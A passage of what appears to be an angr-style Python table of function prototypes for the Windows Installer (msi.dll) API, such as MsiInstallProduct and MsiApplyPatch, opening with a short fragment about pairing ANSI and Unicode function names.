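pairs = pair_ansi_unicode(["MsiEnableLogA", "MsiEnableLogW", "MsiCloseHandle"])
print(sorted(pairs))  # ['MsiEnableLog']
```

`MsiCloseHandle` is handle-based rather than string-based, so it has no `A`/`W` variants and drops out.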
prototypes = \
{
#
'MsiCloseHandle': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["hAny"]),
#
'MsiCloseAllHandles': SimTypeFunction([], SimTypeInt(signed=False, label="UInt32")),
#
'MsiSetInternalUI': SimTypeFunction([SimTypeInt(signed=False, label="INSTALLUILEVEL"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=False, label="INSTALLUILEVEL"), arg_names=["dwUILevel", "phWnd"]),
#
'MsiSetExternalUIA': SimTypeFunction([SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pvContext", "iMessageType", "szMessage"]), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pvContext", "iMessageType", "szMessage"]), offset=0), arg_names=["puiHandler", "dwMessageFilter", "pvContext"]),
#
'MsiSetExternalUIW': SimTypeFunction([SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pvContext", "iMessageType", "szMessage"]), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["pvContext", "iMessageType", "szMessage"]), offset=0), arg_names=["puiHandler", "dwMessageFilter", "pvContext"]),
#
'MsiSetExternalUIRecord': SimTypeFunction([SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvContext", "iMessageType", "hRecord"]), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeBottom(label="Void"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["pvContext", "iMessageType", "hRecord"]), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["puiHandler", "dwMessageFilter", "pvContext", "ppuiPrevHandler"]),
#
'MsiEnableLogA': SimTypeFunction([SimTypeInt(signed=False, label="INSTALLOGMODE"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwLogMode", "szLogFile", "dwLogAttributes"]),
#
'MsiEnableLogW': SimTypeFunction([SimTypeInt(signed=False, label="INSTALLOGMODE"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["dwLogMode", "szLogFile", "dwLogAttributes"]),
#
'MsiQueryProductStateA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct"]),
#
'MsiQueryProductStateW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct"]),
#
'MsiGetProductInfoA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szAttribute", "lpValueBuf", "pcchValueBuf"]),
#
'MsiGetProductInfoW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szAttribute", "lpValueBuf", "pcchValueBuf"]),
#
'MsiGetProductInfoExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "szProperty", "szValue", "pcchValue"]),
#
'MsiGetProductInfoExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "szProperty", "szValue", "pcchValue"]),
#
'MsiInstallProductA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "szCommandLine"]),
#
'MsiInstallProductW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "szCommandLine"]),
#
'MsiConfigureProductA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLLEVEL"), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iInstallLevel", "eInstallState"]),
#
'MsiConfigureProductW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLLEVEL"), SimTypeInt(signed=False, label="INSTALLSTATE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iInstallLevel", "eInstallState"]),
#
'MsiConfigureProductExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLLEVEL"), SimTypeInt(signed=False, label="INSTALLSTATE"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iInstallLevel", "eInstallState", "szCommandLine"]),
#
'MsiConfigureProductExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLLEVEL"), SimTypeInt(signed=False, label="INSTALLSTATE"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iInstallLevel", "eInstallState", "szCommandLine"]),
#
'MsiReinstallProductA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="REINSTALLMODE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szReinstallMode"]),
#
'MsiReinstallProductW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="REINSTALLMODE")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szReinstallMode"]),
#
'MsiAdvertiseProductExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeShort(signed=False, label="UInt16"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "szScriptfilePath", "szTransforms", "lgidLanguage", "dwPlatform", "dwOptions"]),
#
'MsiAdvertiseProductExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeShort(signed=False, label="UInt16"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "szScriptfilePath", "szTransforms", "lgidLanguage", "dwPlatform", "dwOptions"]),
#
'MsiAdvertiseProductA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeShort(signed=False, label="UInt16")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "szScriptfilePath", "szTransforms", "lgidLanguage"]),
#
'MsiAdvertiseProductW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeShort(signed=False, label="UInt16")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPackagePath", "szScriptfilePath", "szTransforms", "lgidLanguage"]),
#
'MsiProcessAdvertiseScriptA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szScriptFile", "szIconFolder", "hRegData", "fShortcuts", "fRemoveItems"]),
#
'MsiProcessAdvertiseScriptW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szScriptFile", "szIconFolder", "hRegData", "fShortcuts", "fRemoveItems"]),
#
'MsiAdvertiseScriptA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szScriptFile", "dwFlags", "phRegData", "fRemoveItems"]),
#
'MsiAdvertiseScriptW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["szScriptFile", "dwFlags", "phRegData", "fRemoveItems"]),
#
'MsiGetProductInfoFromScriptA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szScriptFile", "lpProductBuf39", "plgidLanguage", "pdwVersion", "lpNameBuf", "pcchNameBuf", "lpPackageBuf", "pcchPackageBuf"]),
#
'MsiGetProductInfoFromScriptW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szScriptFile", "lpProductBuf39", "plgidLanguage", "pdwVersion", "lpNameBuf", "pcchNameBuf", "lpPackageBuf", "pcchPackageBuf"]),
#
'MsiGetProductCodeA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "lpBuf39"]),
#
'MsiGetProductCodeW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szComponent", "lpBuf39"]),
#
'MsiGetUserInfoA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="USERINFOSTATE"), arg_names=["szProduct", "lpUserNameBuf", "pcchUserNameBuf", "lpOrgNameBuf", "pcchOrgNameBuf", "lpSerialBuf", "pcchSerialBuf"]),
#
'MsiGetUserInfoW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="USERINFOSTATE"), arg_names=["szProduct", "lpUserNameBuf", "pcchUserNameBuf", "lpOrgNameBuf", "pcchOrgNameBuf", "lpSerialBuf", "pcchSerialBuf"]),
#
'MsiCollectUserInfoA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct"]),
#
'MsiCollectUserInfoW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct"]),
#
'MsiApplyPatchA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLTYPE"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchPackage", "szInstallPackage", "eInstallType", "szCommandLine"]),
#
'MsiApplyPatchW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLTYPE"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchPackage", "szInstallPackage", "eInstallType", "szCommandLine"]),
#
'MsiGetPatchInfoA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatch", "szAttribute", "lpValueBuf", "pcchValueBuf"]),
#
'MsiGetPatchInfoW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatch", "szAttribute", "lpValueBuf", "pcchValueBuf"]),
#
'MsiEnumPatchesA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iPatchIndex", "lpPatchBuf", "lpTransformsBuf", "pcchTransformsBuf"]),
#
'MsiEnumPatchesW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "iPatchIndex", "lpPatchBuf", "lpTransformsBuf", "pcchTransformsBuf"]),
#
'MsiRemovePatchesA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="INSTALLTYPE"), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchList", "szProductCode", "eUninstallType", "szPropertyList"]),
#
'MsiRemovePatchesW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="INSTALLTYPE"), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchList", "szProductCode", "eUninstallType", "szPropertyList"]),
#
'MsiExtractPatchXMLDataA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchPath", "dwReserved", "szXMLData", "pcchXMLData"]),
#
'MsiExtractPatchXMLDataW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchPath", "dwReserved", "szXMLData", "pcchXMLData"]),
#
'MsiGetPatchInfoExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchCode", "szProductCode", "szUserSid", "dwContext", "szProperty", "lpValue", "pcchValue"]),
#
'MsiGetPatchInfoExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchCode", "szProductCode", "szUserSid", "dwContext", "szProperty", "lpValue", "pcchValue"]),
#
'MsiApplyMultiplePatchesA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchPackages", "szProductCode", "szPropertiesList"]),
#
'MsiApplyMultiplePatchesW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szPatchPackages", "szProductCode", "szPropertiesList"]),
#
'MsiDeterminePatchSequenceA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"szPatchData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "ePatchDataType": SimTypeInt(signed=False, label="MSIPATCHDATATYPE"), "dwOrder": SimTypeInt(signed=False, label="UInt32"), "uStatus": SimTypeInt(signed=False, label="UInt32")}, name="MSIPATCHSEQUENCEINFOA", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "cPatchInfo", "pPatchInfo"]),
#
'MsiDeterminePatchSequenceW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"szPatchData": SimTypePointer(SimTypeChar(label="Char"), offset=0), "ePatchDataType": SimTypeInt(signed=False, label="MSIPATCHDATATYPE"), "dwOrder": SimTypeInt(signed=False, label="UInt32"), "uStatus": SimTypeInt(signed=False, label="UInt32")}, name="MSIPATCHSEQUENCEINFOW", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "cPatchInfo", "pPatchInfo"]),
#
'MsiDetermineApplicablePatchesA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"szPatchData": SimTypePointer(SimTypeChar(label="Byte"), offset=0), "ePatchDataType": SimTypeInt(signed=False, label="MSIPATCHDATATYPE"), "dwOrder": SimTypeInt(signed=False, label="UInt32"), "uStatus": SimTypeInt(signed=False, label="UInt32")}, name="MSIPATCHSEQUENCEINFOA", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductPackagePath", "cPatchInfo", "pPatchInfo"]),
#
'MsiDetermineApplicablePatchesW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"szPatchData": SimTypePointer(SimTypeChar(label="Char"), offset=0), "ePatchDataType": SimTypeInt(signed=False, label="MSIPATCHDATATYPE"), "dwOrder": SimTypeInt(signed=False, label="UInt32"), "uStatus": SimTypeInt(signed=False, label="UInt32")}, name="MSIPATCHSEQUENCEINFOW", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductPackagePath", "cPatchInfo", "pPatchInfo"]),
#
'MsiEnumPatchesExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "dwFilter", "dwIndex", "szPatchCode", "szTargetProductCode", "pdwTargetProductContext", "szTargetUserSid", "pcchTargetUserSid"]),
#
'MsiEnumPatchesExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), offset=0), SimTypePointer(SimTypeChar(label="Char"), label="LPArray", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "dwFilter", "dwIndex", "szPatchCode", "szTargetProductCode", "pdwTargetProductContext", "szTargetUserSid", "pcchTargetUserSid"]),
#
'MsiQueryFeatureStateA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szFeature"]),
#
'MsiQueryFeatureStateW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szFeature"]),
#
'MsiQueryFeatureStateExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "szFeature", "pdwState"]),
#
'MsiQueryFeatureStateExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="MSIINSTALLCONTEXT"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="INSTALLSTATE"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProductCode", "szUserSid", "dwContext", "szFeature", "pdwState"]),
#
'MsiUseFeatureA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szFeature"]),
#
'MsiUseFeatureW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0)], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szFeature"]),
#
'MsiUseFeatureExA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szFeature", "dwInstallMode", "dwReserved"]),
#
'MsiUseFeatureExW': SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="INSTALLSTATE"), arg_names=["szProduct", "szFeature", "dwInstallMode", "dwReserved"]),
#
'MsiGetFeatureUsageA': SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeShort(signed=False, label="UInt16"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["szProduct", "szFeature", "pdwUseCount", "pwDateUsed"]),
#
